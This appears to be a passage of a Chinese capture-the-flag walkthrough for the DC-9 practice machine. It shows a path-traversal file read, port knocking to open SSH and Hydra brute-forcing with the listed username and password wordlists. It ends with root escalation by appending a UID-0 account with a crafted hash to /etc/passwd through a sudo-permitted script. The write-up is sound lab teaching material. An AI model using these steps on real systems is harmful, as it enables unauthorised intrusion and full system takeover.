echo -e "marym\njulied\nfredf\nbarneyr\ntomc\njerrym\nwilmaf\nbettyr\nchandlerb\njoeyt\nrachelg\nrossg\nmonicag\nphoebeb\nscoots\njanitor\njanitor2" > user.txt
创建密码字典文件 (passwords.txt)
cat > passwords.txt << 'EOF'
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
EOF
爆破
提权
ssh爆破得到三个用户名和密码,分别登录即可。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。但我这里通过爆破后进行ssh登录时可直接登录的,可能在前面端口扫描时触发了规则导致打开。
存在knockd服务。
该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来"敲门",使系统开启需要访问的服务端口,才能对外访问。
不使用时,再使用自定义的序列号来"关门",将端口关闭,不对外监听。进一步提升了服务和系统的安全//配置文件路径
默认配置文件是:/etc/knockd.conf
http://192.168.0.114/welcome.php?file=../../../../../etc/knockd.conf
File does not exist
[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
//自定义端口后,依次对其进行敲门,然后就可以开启ssh服务进行连接了
//命令如下:
nmap 192.168.0.114 -p 7469
nmap 192.168.0.114 -p 8475
nmap 192.168.0.114 -p 9842
//执行完成过后,重新扫描22端口,即可发现ssh服务已经开启,可以访问
┌──(root㉿kali)-[~]
└─# nmap 192.168.0.114 -p 7469
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-22 00:01 EST
Nmap scan report for 192.168.0.114
Host is up (0.00025s latency).PORT STATE SERVICE
7469/tcp closed unknown
MAC Address: 00:0C:29:19:1A:7B (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
┌──(root㉿kali)-[~]
└─# nmap 192.168.0.114 -p 8475
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-22 00:01 EST
Nmap scan report for 192.168.0.114
Host is up (0.00021s latency).PORT STATE SERVICE
8475/tcp closed unknown
MAC Address: 00:0C:29:19:1A:7B (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
┌──(root㉿kali)-[~]
└─# nmap 192.168.0.114 -p 9842
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-22 00:01 EST
Nmap scan report for 192.168.0.114
Host is up (0.00021s latency).PORT STATE SERVICE
9842/tcp closed unknown
MAC Address: 00:0C:29:19:1A:7B (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
┌──(root㉿kali)-[~]
└─#
成功开启
┌──(root㉿kali)-[~]
└─# nmap 192.168.0.114 -p22
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-22 00:02 EST
Nmap scan report for 192.168.0.114
Host is up (0.00017s latency).PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:19:1A:7B (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
┌──(root㉿kali)-[~]
└─#
接下来爆破
hydra -L user.txt -P passwords.txt ssh://192.168.0.114
┌──(root㉿kali)-[~]
└─# hydra -L user.txt -P passwords.txt ssh://192.168.0.114
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-22 00:03:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.0.114:22/
[22][ssh] host: 192.168.0.114 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.0.114 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.0.114 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-22 00:04:18
三、权限维持
1、查看目录
find / -perm -u=s -type f 2>/dev/nullls -al
chandlerb用户:
ssh [email protected]
password: UrAG0D!
chandlerb@dc-9:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
chandlerb@dc-9:~$
chandlerb@dc-9:~$ ls -al
total 12
drwx------ 3 chandlerb chandlerb 4096 Nov 22 15:03 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 chandlerb chandlerb 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 chandlerb chandlerb 4096 Nov 22 15:03 .gnupg
chandlerb@dc-9:~$
joeyt用户:
ssh [email protected]
password: Passw0rd
joeyt@dc-9:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
joeyt@dc-9:~$ ls -al
total 12
drwx------ 3 joeyt joeyt 4096 Nov 22 15:03 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 joeyt joeyt 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 joeyt joeyt 4096 Nov 22 15:03 .gnupg
joeyt@dc-9:~$
janitor用户:
ssh [email protected]
password: Ilovepeepee
┌──(root㉿kali)-[~]
└─# ssh [email protected]
[email protected]'s password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
janitor@dc-9:~$ ls -al
total 16
drwx------ 4 janitor janitor 4096 Nov 22 15:04 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Nov 22 15:04 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$
但是通过三者发现在janitor用户的家目录下多了一个隐藏文件,查看后发现为密码文件,那么将这些密码添加到之前的字典当中,再次爆破一次
janitor@dc-9:~$ ls -al
total 16
drwx------ 4 janitor janitor 4096 Nov 22 15:04 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Nov 22 15:04 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putin
janitor@dc-9:~$
janitor@dc-9:~$
janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$
爆破
hydra -L user.txt -P passwords.txt ssh://192.168.0.114
┌──(root㉿kali)-[~]
└─# hydra -L user.txt -P passwords.txt ssh://192.168.0.114
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-11-22 00:15:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://192.168.0.114:22/
[22][ssh] host: 192.168.0.114 login: fredf password: B4-Tru3-001
[22][ssh] host: 192.168.0.114 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.0.114 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.0.114 login: janitor password: Ilovepeepee
[STATUS] 375.00 tries/min, 375 tries in 00:01h, 17 to do in 00:01h, 15 active
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-11-22 00:16:50
发现成功爆破出新的用户登录信息,进行登录。或者直接su切换也可
janitor@dc-9:~/.secrets-for-putin$ su fredf
Password:
fredf@dc-9:/home/janitor/.secrets-for-putin$
2、查看到以root权限运行的文件
sudo -lfind / -perm -u=s -type f 2>/dev/null
ls -al
fredf@dc-9:/home/janitor/.secrets-for-putin$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:/home/janitor/.secrets-for-putin$
fredf@dc-9:/home/janitor/.secrets-for-putin$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chsh
/usr/bin/umount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
fredf@dc-9:/home/janitor/.secrets-for-putin$
fredf@dc-9:/home/janitor/.secrets-for-putin$ ls -al
ls: cannot open directory '.': Permission denied
fredf@dc-9:~$
fredf@dc-9:~$ ls -l /opt/devstuff/dist/test/test
-rwxr-xr-x 1 root root 1212968 Dec 29 2019 /opt/devstuff/dist/test/test
fredf@dc-9:~$
fredf@dc-9:/opt/devstuff/dist/test$ ls
base_library.zip libbz2.so.1.0 _lzma.cpython-37m-x86_64-linux-gnu.so
_bz2.cpython-37m-x86_64-linux-gnu.so libcrypto.so.1.1 _multibytecodec.cpython-37m-x86_64-linux-gnu.so
_codecs_cn.cpython-37m-x86_64-linux-gnu.so libexpat.so.1 _opcode.cpython-37m-x86_64-linux-gnu.so
_codecs_hk.cpython-37m-x86_64-linux-gnu.so liblzma.so.5 readline.cpython-37m-x86_64-linux-gnu.so
_codecs_iso2022.cpython-37m-x86_64-linux-gnu.so libpython3.7m.so.1.0 resource.cpython-37m-x86_64-linux-gnu.so
_codecs_jp.cpython-37m-x86_64-linux-gnu.so libreadline.so.7 _ssl.cpython-37m-x86_64-linux-gnu.so
_codecs_kr.cpython-37m-x86_64-linux-gnu.so libssl.so.1.1 termios.cpython-37m-x86_64-linux-gnu.so
_codecs_tw.cpython-37m-x86_64-linux-gnu.so libtinfo.so.6 test
_hashlib.cpython-37m-x86_64-linux-gnu.so libz.so.1
fredf@dc-9:/opt/devstuff/dist/test$
fredf@dc-9:/opt/devstuff/dist/test$ cd ..
fredf@dc-9:/opt/devstuff/dist$
fredf@dc-9:/opt/devstuff/dist$ ls
test
fredf@dc-9:/opt/devstuff/dist$ cd ..
fredf@dc-9:/opt/devstuff$
fredf@dc-9:/opt/devstuff$ ls
build dist __pycache__ test.py test.spec
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/pythonimport sys
if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)else :
f = open(sys.argv[1], "r")
output = (f.read())f = open(sys.argv[2], "a")
f.write(output)
f.close()
fredf@dc-9:/opt/devstuff$
那么接下来就可以进行构造/etc/passwd文件当中的信息,进行追加用户信息即可提权,仿照/etc/passwd文件当中内容进行构造信息
3、提权
将构造的信息保存到一个文件当中,然后接下来执行text即可
fredf@dc-9:/opt/devstuff$ openssl passwd -1 -salt 123 admin
$1$123$Ok9FhQy4YioYZeBPwQgm3/
fredf@dc-9:/opt/devstuff$
//etc/passwd下的root用户信息
root:x:0:0:root:/root:/bin/bash//根据root信息,构造用户信息追加到/etc/passwd文件当中,添加admin用户
admin:$1$123$Ok9FhQy4YioYZeBPwQgm3/:0:0:admin:/root:/bin/bash
fredf@dc-9:/tmp$ vi passwd
fredf@dc-9:/tmp$
fredf@dc-9:/tmp$
fredf@dc-9:/tmp$ ls
passwd
systemd-private-42e34a0250c047bd905fc4ff0e8e6bb8-apache2.service-TCBHNX
systemd-private-42e34a0250c047bd905fc4ff0e8e6bb8-systemd-timesyncd.service-rXCWSL
fredf@dc-9:/tmp$
fredf@dc-9:/tmp$ cat passwd
admin:$1$123$Ok9FhQy4YioYZeBPwQgm3/:0:0:admin:/root:/bin/bash
fredf@dc-9:/tmp$
fredf@dc-9:/tmp$ sudo /opt/devstuff/dist/test/test /tmp/passwd /etc/passwd
fredf@dc-9:/tmp$
成功追加
fredf@dc-9:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash
julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash
tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash
jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash
wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash
bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash
chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash
joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash
rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash
rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash
phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash
scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash
admin:$1$123$Ok9FhQy4YioYZeBPwQgm3/:0:0:admin:/root:/bin/bash
fredf@dc-9:/tmp$
直接su切换admin用户,输入密码,成功提权
su admin
Password:admin
fredf@dc-9:/tmp$ su admin
Password:
root@dc-9:/tmp# ls
passwd
systemd-private-42e34a0250c047bd905fc4ff0e8e6bb8-apache2.service-TCBHNX
systemd-private-42e34a0250c047bd905fc4ff0e8e6bb8-systemd-timesyncd.service-rXCWSL
root@dc-9:/tmp#
root@dc-9:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-9:/tmp#
root@dc-9:/tmp# cd /root
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.
root@dc-9:~#
本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路,始于合规,终于责任。
如有侵权请联系:admin#unsafe.sh